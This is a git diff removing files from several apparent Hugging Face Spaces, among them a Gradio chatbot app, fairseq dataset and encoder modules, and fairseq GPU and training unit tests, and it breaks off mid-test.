    " - -#css=".gradio-container {background-color: papayawhip}", - -gr.Interface( - predict_CTH, - inputs=input_txt, - outputs="label", - interpretation="default", - description=description, - #live=True, - examples = ['200 SI/SI/SI LPO ALUMINIUM LIDS (QTY: 8820000 PCS/PRICE: 21.'], - title=title, - article=article, -).launch() \ No newline at end of file diff --git a/spaces/NarendraC/MyAIChatBot/app.py b/spaces/NarendraC/MyAIChatBot/app.py deleted file mode 100644 index 9ede0bd38a0bf7b5a72db19bf134e66df1d9d1cc..0000000000000000000000000000000000000000 --- a/spaces/NarendraC/MyAIChatBot/app.py +++ /dev/null @@ -1,34 +0,0 @@ -import os -import gradio as gr -from langchain.chat_models import ChatOpenAI -from langchain import LLMChain, PromptTemplate -from langchain.memory import ConversationBufferMemory - -OPENAI_API_KEY=os.getenv('OPENAI_API_KEY') - -template = """Meet Riya, your youthful and witty personal assistant! At 21 years old, she's full of energy and always eager to help. Riya's goal is to assist you with any questions or problems you might have. Her enthusiasm shines through in every response, making interactions with her enjoyable and engaging.. -{chat_history} -User: {user_message} -Chatbot:""" - -prompt = PromptTemplate( - input_variables=["chat_history", "user_message"], template=template -) - -memory = ConversationBufferMemory(memory_key="chat_history") - -llm_chain = LLMChain( - llm=ChatOpenAI(temperature='0.5', model_name="gpt-3.5-turbo"), - prompt=prompt, - verbose=True, - memory=memory, -) - -def get_text_response(user_message,history): - response = llm_chain.predict(user_message = user_message) - return response - -demo = gr.ChatInterface(get_text_response) - -if __name__ == "__main__": - demo.launch() #To create a public link, set `share=True` in `launch()`. To enable errors and logs, set `debug=True` in `launch()`. diff --git a/spaces/OAOA/DifFace/basicsr/data/prefetch_dataloader.py b/spaces/OAOA/DifFace/basicsr/data/prefetch_dataloader.py deleted file mode 100644 index 332abd32fcb004e6892d12dc69848a4454e3c503..0000000000000000000000000000000000000000 --- a/spaces/OAOA/DifFace/basicsr/data/prefetch_dataloader.py +++ /dev/null @@ -1,122 +0,0 @@ -import queue as Queue -import threading -import torch -from torch.utils.data import DataLoader - - -class PrefetchGenerator(threading.Thread): - """A general prefetch generator. - - Reference: https://stackoverflow.com/questions/7323664/python-generator-pre-fetch - - Args: - generator: Python generator. - num_prefetch_queue (int): Number of prefetch queue. - """ - - def __init__(self, generator, num_prefetch_queue): - threading.Thread.__init__(self) - self.queue = Queue.Queue(num_prefetch_queue) - self.generator = generator - self.daemon = True - self.start() - - def run(self): - for item in self.generator: - self.queue.put(item) - self.queue.put(None) - - def __next__(self): - next_item = self.queue.get() - if next_item is None: - raise StopIteration - return next_item - - def __iter__(self): - return self - - -class PrefetchDataLoader(DataLoader): - """Prefetch version of dataloader. - - Reference: https://github.com/IgorSusmelj/pytorch-styleguide/issues/5# - - TODO: - Need to test on single gpu and ddp (multi-gpu). There is a known issue in - ddp. - - Args: - num_prefetch_queue (int): Number of prefetch queue. - kwargs (dict): Other arguments for dataloader. 
- """ - - def __init__(self, num_prefetch_queue, **kwargs): - self.num_prefetch_queue = num_prefetch_queue - super(PrefetchDataLoader, self).__init__(**kwargs) - - def __iter__(self): - return PrefetchGenerator(super().__iter__(), self.num_prefetch_queue) - - -class CPUPrefetcher(): - """CPU prefetcher. - - Args: - loader: Dataloader. - """ - - def __init__(self, loader): - self.ori_loader = loader - self.loader = iter(loader) - - def next(self): - try: - return next(self.loader) - except StopIteration: - return None - - def reset(self): - self.loader = iter(self.ori_loader) - - -class CUDAPrefetcher(): - """CUDA prefetcher. - - Reference: https://github.com/NVIDIA/apex/issues/304# - - It may consume more GPU memory. - - Args: - loader: Dataloader. - opt (dict): Options. - """ - - def __init__(self, loader, opt): - self.ori_loader = loader - self.loader = iter(loader) - self.opt = opt - self.stream = torch.cuda.Stream() - self.device = torch.device('cuda' if opt['num_gpu'] != 0 else 'cpu') - self.preload() - - def preload(self): - try: - self.batch = next(self.loader) # self.batch is a dict - except StopIteration: - self.batch = None - return None - # put tensors to gpu - with torch.cuda.stream(self.stream): - for k, v in self.batch.items(): - if torch.is_tensor(v): - self.batch[k] = self.batch[k].to(device=self.device, non_blocking=True) - - def next(self): - torch.cuda.current_stream().wait_stream(self.stream) - batch = self.batch - self.preload() - return batch - - def reset(self): - self.loader = iter(self.ori_loader) - self.preload() diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py deleted file mode 100644 index 44f7989bd863329f763aa62b78df2eb42b3084ea..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py +++ /dev/null @@ -1,54 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch.nn as nn -from fairseq.models.transformer import TransformerEncoder - -from .linformer_sentence_encoder_layer import LinformerTransformerEncoderLayer - - -class LinformerTransformerEncoder(TransformerEncoder): - """ - Implementation for a Bi-directional Linformer based Sentence Encoder used - in BERT/XLM style pre-trained models. - - This first computes the token embedding using the token embedding matrix, - position embeddings (if specified) and segment embeddings - (if specified). After applying the specified number of - LinformerEncoderLayers, it outputs all the internal states of the - encoder as well as the final representation associated with the first - token (usually CLS token). - - Input: - - tokens: B x T matrix representing sentences - - segment_labels: B x T matrix representing segment label for tokens - - Output: - - a tuple of the following: - - a list of internal model states used to compute the - predictions where each tensor has shape T x B x C - - sentence representation associated with first input token - in format B x C. 
- """ - - def __init__(self, args, dictionary, embed_tokens): - self.compress_layer = None - super().__init__(args, dictionary, embed_tokens) - - def build_encoder_layer(self, args): - if self.args.shared_layer_kv_compressed == 1 and self.compress_layer is None: - compress_layer = nn.Linear( - self.args.max_positions, - self.args.max_positions // self.args.compressed, - ) - # intialize parameters for compressed layer - nn.init.xavier_uniform_(compress_layer.weight, gain=1 / math.sqrt(2)) - if self.args.freeze_compress == 1: - compress_layer.weight.requires_grad = False - self.compress_layer = compress_layer - - return LinformerTransformerEncoderLayer(args, self.compress_layer) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/data/backtranslation_dataset.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/data/backtranslation_dataset.py deleted file mode 100644 index 8f70c90df3d237077537993e125d366c95292f1a..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/data/backtranslation_dataset.py +++ /dev/null @@ -1,165 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import torch -from fairseq import utils - -from . import FairseqDataset - - -def backtranslate_samples(samples, collate_fn, generate_fn, cuda=True): - """Backtranslate a list of samples. - - Given an input (*samples*) of the form: - - [{'id': 1, 'source': 'hallo welt'}] - - this will return: - - [{'id': 1, 'source': 'hello world', 'target': 'hallo welt'}] - - Args: - samples (List[dict]): samples to backtranslate. Individual samples are - expected to have a 'source' key, which will become the 'target' - after backtranslation. - collate_fn (callable): function to collate samples into a mini-batch - generate_fn (callable): function to generate backtranslations - cuda (bool): use GPU for generation (default: ``True``) - - Returns: - List[dict]: an updated list of samples with a backtranslated source - """ - collated_samples = collate_fn(samples) - s = utils.move_to_cuda(collated_samples) if cuda else collated_samples - generated_sources = generate_fn(s) - - id_to_src = {sample["id"]: sample["source"] for sample in samples} - - # Go through each tgt sentence in batch and its corresponding best - # generated hypothesis and create a backtranslation data pair - # {id: id, source: generated backtranslation, target: original tgt} - return [ - { - "id": id.item(), - "target": id_to_src[id.item()], - "source": hypos[0]["tokens"].cpu(), - } - for id, hypos in zip(collated_samples["id"], generated_sources) - ] - - -class BacktranslationDataset(FairseqDataset): - """ - Sets up a backtranslation dataset which takes a tgt batch, generates - a src using a tgt-src backtranslation function (*backtranslation_fn*), - and returns the corresponding `{generated src, input tgt}` batch. - - Args: - tgt_dataset (~fairseq.data.FairseqDataset): the dataset to be - backtranslated. Only the source side of this dataset will be used. - After backtranslation, the source sentences in this dataset will be - returned as the targets. - src_dict (~fairseq.data.Dictionary): the dictionary of backtranslated - sentences. - tgt_dict (~fairseq.data.Dictionary, optional): the dictionary of - sentences to be backtranslated. - backtranslation_fn (callable, optional): function to call to generate - backtranslations. 
This is typically the `generate` method of a - :class:`~fairseq.sequence_generator.SequenceGenerator` object. - Pass in None when it is not available at initialization time, and - use set_backtranslation_fn function to set it when available. - output_collater (callable, optional): function to call on the - backtranslated samples to create the final batch - (default: ``tgt_dataset.collater``). - cuda: use GPU for generation - """ - - def __init__( - self, - tgt_dataset, - src_dict, - tgt_dict=None, - backtranslation_fn=None, - output_collater=None, - cuda=True, - **kwargs - ): - self.tgt_dataset = tgt_dataset - self.backtranslation_fn = backtranslation_fn - self.output_collater = ( - output_collater if output_collater is not None else tgt_dataset.collater - ) - self.cuda = cuda if torch.cuda.is_available() else False - self.src_dict = src_dict - self.tgt_dict = tgt_dict - - def __getitem__(self, index): - """ - Returns a single sample from *tgt_dataset*. Note that backtranslation is - not applied in this step; use :func:`collater` instead to backtranslate - a batch of samples. - """ - return self.tgt_dataset[index] - - def __len__(self): - return len(self.tgt_dataset) - - def set_backtranslation_fn(self, backtranslation_fn): - self.backtranslation_fn = backtranslation_fn - - def collater(self, samples): - """Merge and backtranslate a list of samples to form a mini-batch. - - Using the samples from *tgt_dataset*, load a collated target sample to - feed to the backtranslation model. Then take the backtranslation with - the best score as the source and the original input as the target. - - Note: we expect *tgt_dataset* to provide a function `collater()` that - will collate samples into the format expected by *backtranslation_fn*. - After backtranslation, we will feed the new list of samples (i.e., the - `(backtranslated source, original source)` pairs) to *output_collater* - and return the result. - - Args: - samples (List[dict]): samples to backtranslate and collate - - Returns: - dict: a mini-batch with keys coming from *output_collater* - """ - if samples[0].get("is_dummy", False): - return samples - samples = backtranslate_samples( - samples=samples, - collate_fn=self.tgt_dataset.collater, - generate_fn=(lambda net_input: self.backtranslation_fn(net_input)), - cuda=self.cuda, - ) - return self.output_collater(samples) - - def num_tokens(self, index): - """Just use the tgt dataset num_tokens""" - return self.tgt_dataset.num_tokens(index) - - def ordered_indices(self): - """Just use the tgt dataset ordered_indices""" - return self.tgt_dataset.ordered_indices() - - def size(self, index): - """Return an example's size as a float or tuple. This value is used - when filtering a dataset with ``--max-positions``. - - Note: we use *tgt_dataset* to approximate the length of the source - sentence, since we do not know the actual length until after - backtranslation. 
- """ - tgt_size = self.tgt_dataset.size(index)[0] - return (tgt_size, tgt_size) - - @property - def supports_prefetch(self): - return getattr(self.tgt_dataset, "supports_prefetch", False) - - def prefetch(self, indices): - return self.tgt_dataset.prefetch(indices) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/gpu/test_binaries_gpu.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/gpu/test_binaries_gpu.py deleted file mode 100644 index de8c2426134089035c6e0e5da223647bab6f3dba..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/gpu/test_binaries_gpu.py +++ /dev/null @@ -1,449 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import contextlib -import logging -import json -import os -import tempfile -import unittest -from io import StringIO - -import torch -from fairseq import options -from fairseq_cli import train -from tests.utils import ( - create_dummy_data, - generate_main, - preprocess_lm_data, - preprocess_translation_data, - train_translation_model, -) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestTranslationGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fp16_multigpu(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--fp16", "--log-file", log], - world_size=min(torch.cuda.device_count(), 2), - ) - generate_main(data_dir) - assert os.path.exists(log) - - @staticmethod - def parse_logs(logfile): - logs = [] - for ln in open(logfile, "r").readlines(): - try: - logs.append(json.loads(ln)) - except json.JSONDecodeError: - continue - return logs - - def test_resume_training_fsdp(self): - self._test_resume_training(["--ddp-backend", "fully_sharded"]) - - def test_resume_training_fsdp_sharded_state(self): - self._test_resume_training(["--ddp-backend", "fully_sharded", "--use-sharded-state"]) - - def test_resume_training_noc10d(self): - self._test_resume_training([]) - - def _test_resume_training(self, extra_clargs, arch="fconv_iwslt_de_en"): - flags = [ - "--fp16", - "--log-format", - "json", - "--max-update", - "10", - "--save-interval-updates", - "2", - "--log-interval", - "1", - ] + extra_clargs - world_size = min(torch.cuda.device_count(), 2) - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, arch, flags + ["--log-file", log], world_size=world_size, - ) - log2 = os.path.join(data_dir, "resume.log") - restore_file = os.path.join(data_dir, "checkpoint_1_2.pt") - train_translation_model( - data_dir, - arch, - flags + ["--log-file", log2, "--restore-file", restore_file], - world_size=world_size, - ) - - l1 = self.parse_logs(log) - l2 = self.parse_logs(log2) - assert int(l2[0]["num_updates"]) == 3, f"{l1}\n\n {l2}" - for k in [ - "train_loss", - "train_num_updates", - "train_ppl", - "train_gnorm", - ]: - from_scratch, resumed = l1[-1][k], l2[-1][k] - assert ( - from_scratch == resumed - ), 
f"difference at {k} {from_scratch} != {resumed}" - - def test_memory_efficient_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_memory_efficient_fp16") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--memory-efficient-fp16"] - ) - generate_main(data_dir) - - def test_transformer_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--fp16", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_amp") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en", ["--amp"]) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_transformer_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--amp", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_levenshtein_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_levenshtein_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "levenshtein_transformer", - [ - "--apply-bert-init", - "--early-exit", - "6,6,6", - "--criterion", - "nat_loss", - ], - task="translation_lev", - ) - gen_config = [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ] - # non-ensemble generation - generate_main(data_dir, gen_config) - # ensemble generation - generate_main( - data_dir, - gen_config, - path=os.pathsep.join( - [ - os.path.join(data_dir, "checkpoint_last.pt"), - os.path.join(data_dir, "checkpoint_last.pt"), - ] - ), - ) - - def test_fsdp_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded"], - world_size=world_size, - ) - generate_main(data_dir) - assert os.path.exists(log) - - def test_fsdp_sharded_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - 
preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded", "--use-sharded-state"], - world_size=world_size, - ) - generate_main(data_dir, ["--checkpoint-shard-count", str(world_size)]) - assert os.path.exists(log) - - -def _quantize_language_model(data_dir, arch, extra_flags=None, run_validation=False): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - # try scalar quantization - scalar_quant_train_parser = options.get_training_parser() - scalar_quant_train_args = options.parse_args_and_arch( - scalar_quant_train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-update", - "3", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--quant-noise-scalar", - "0.5", - ] - + (extra_flags or []), - ) - train.main(scalar_quant_train_args) - - # try iterative PQ quantization - quantize_parser = options.get_training_parser() - quantize_args = options.parse_args_and_arch( - quantize_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "50", - "--tokens-per-sample", - "50", - "--max-update", - "6", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--restore-file", - os.path.join(data_dir, "checkpoint_last.pt"), - "--reset-optimizer", - "--quantization-config-path", - os.path.join( - os.path.dirname(__file__), "transformer_quantization_config.yaml" - ), - ] - + (extra_flags or []), - ) - train.main(quantize_args) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestQuantization(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_quantization(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_quantization") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - # tests both scalar and iterative PQ quantization - _quantize_language_model(data_dir, "transformer_lm") - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestOptimizersGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_flat_grads(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_flat_grads") as data_dir: - # Use just a bit of data and tiny 
model to keep this test runtime reasonable - create_dummy_data(data_dir, num_examples=10, maxlen=5) - preprocess_translation_data(data_dir) - with self.assertRaises(RuntimeError): - # adafactor isn't compatible with flat grads, which - # are used by default with --fp16 - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - ], - ) - # but it should pass once we set --fp16-no-flatten-grads - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - "--fp16-no-flatten-grads", - ], - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/rxf/rxf_src/__init__.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/rxf/rxf_src/__init__.py deleted file mode 100644 index 306e232d6f386b26153864601114e162080dcee4..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/rxf/rxf_src/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import label_smoothed_cross_entropy_r3f, sentence_prediction_r3f # noqa diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/test_binaries.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/test_binaries.py deleted file mode 100644 index 4e207742625427f108f78bcd24d487a081b6ccf7..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/test_binaries.py +++ /dev/null @@ -1,1874 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import contextlib -import logging -import json -import os -import random -import sys -import tempfile -import unittest -from io import StringIO -from typing import List, Dict -import torch -from fairseq import options -from fairseq_cli import eval_lm, train -from tests.utils import ( - create_dummy_data, - generate_main, - preprocess_lm_data, - preprocess_summarization_data, - preprocess_translation_data, - create_laser_data_and_config_json, - train_translation_model, - train_language_model, -) - - -try: - import transformers # noqa - - has_hf_transformers = True -except ImportError: - has_hf_transformers = False - - -class TestTranslation(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fconv(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en") - generate_main(data_dir) - - def test_raw(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv_raw") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--dataset-impl", "raw"]) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--dataset-impl", "raw"] - ) - generate_main(data_dir, ["--dataset-impl", "raw"]) - - def test_update_freq(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_update_freq") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--update-freq", "3"] - ) - generate_main(data_dir) - - def test_max_positions(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_max_positions") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - with self.assertRaises(Exception) as context: - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--max-target-positions", "5"], - ) - self.assertTrue( - "skip this example with --skip-invalid-size-inputs-valid-test" - in str(context.exception) - ) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - [ - "--max-target-positions", - "5", - "--skip-invalid-size-inputs-valid-test", - ], - ) - with self.assertRaises(Exception) as context: - generate_main(data_dir) - generate_main(data_dir, ["--skip-invalid-size-inputs-valid-test"]) - - def test_generation(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_sampling") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en") - generate_main( - data_dir, - [ - "--sampling", - "--temperature", - "2", - "--beam", - "2", - "--nbest", - "2", - ], - ) - generate_main( - data_dir, - [ - "--sampling", - "--sampling-topk", - "3", - "--beam", - "2", - "--nbest", - "2", - ], - ) - generate_main( - data_dir, - [ - "--sampling", - "--sampling-topp", - "0.2", - "--beam", - "2", - "--nbest", - "2", - ], - ) - generate_main( - data_dir, - [ - "--diversity-rate", - "0.5", - "--beam", - "6", - ], - ) - with self.assertRaises(ValueError): - generate_main( - data_dir, - [ - "--diverse-beam-groups", - "4", - "--match-source-len", - ], - ) - generate_main(data_dir, ["--prefix-size", "2"]) - generate_main(data_dir, ["--retain-dropout"]) - - def 
test_eval_bleu(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_eval_bleu") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - [ - "--eval-bleu", - "--eval-bleu-print-samples", - "--eval-bleu-remove-bpe", - "--eval-bleu-detok", - "space", - "--eval-bleu-args", - '{"beam": 4, "min_len": 10}', - ], - ) - - def test_lstm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lstm_wiseman_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-out-embed-dim", - "8", - ], - ) - generate_main(data_dir) - - def test_lstm_bidirectional(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm_bidirectional") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lstm", - [ - "--encoder-layers", - "2", - "--encoder-bidirectional", - "--encoder-hidden-size", - "16", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-out-embed-dim", - "8", - "--decoder-layers", - "2", - ], - ) - generate_main(data_dir) - - def test_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - run_validation=True, - ) - generate_main(data_dir) - - def test_multilingual_transformer(self): - # test with all combinations of encoder/decoder lang tokens - encoder_langtok_flags = [ - [], - ["--encoder-langtok", "src"], - ["--encoder-langtok", "tgt"], - ] - decoder_langtok_flags = [[], ["--decoder-langtok"]] - with contextlib.redirect_stdout(StringIO()): - for i in range(len(encoder_langtok_flags)): - for j in range(len(decoder_langtok_flags)): - enc_ltok_flag = encoder_langtok_flags[i] - dec_ltok_flag = decoder_langtok_flags[j] - with tempfile.TemporaryDirectory( - f"test_multilingual_transformer_{i}_{j}" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - arch="multilingual_transformer", - task="multilingual_translation", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out,out-in"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "multilingual_translation", - "--lang-pairs", - "in-out,out-in", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - @unittest.skipIf( - sys.platform.lower() == "darwin", "skip latent depth test on MacOS" - ) - def test_multilingual_translation_latent_depth(self): - # test with latent depth in encoder, decoder, or both - encoder_latent_layer = [[], ["--encoder-latent-layer"]] - decoder_latent_layer = [[], ["--decoder-latent-layer"]] - with 
contextlib.redirect_stdout(StringIO()): - for i in range(len(encoder_latent_layer)): - for j in range(len(decoder_latent_layer)): - if i == 0 and j == 0: - continue - enc_ll_flag = encoder_latent_layer[i] - dec_ll_flag = decoder_latent_layer[j] - with tempfile.TemporaryDirectory( - f"test_multilingual_translation_latent_depth_{i}_{j}" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data( - data_dir, extra_flags=["--joined-dictionary"] - ) - train_translation_model( - data_dir, - arch="latent_multilingual_transformer", - task="multilingual_translation_latent_depth", - extra_flags=[ - "--user-dir", - "examples/latent_depth/latent_depth_src", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--share-encoders", - "--share-decoders", - "--sparsity-weight", - "0.1", - ] - + enc_ll_flag - + dec_ll_flag, - lang_flags=["--lang-pairs", "in-out,out-in"], - run_validation=True, - extra_valid_flags=[ - "--user-dir", - "examples/latent_depth/latent_depth_src", - ] - + enc_ll_flag - + dec_ll_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--user-dir", - "examples/latent_depth/latent_depth_src", - "--task", - "multilingual_translation_latent_depth", - "--lang-pairs", - "in-out,out-in", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ll_flag - + 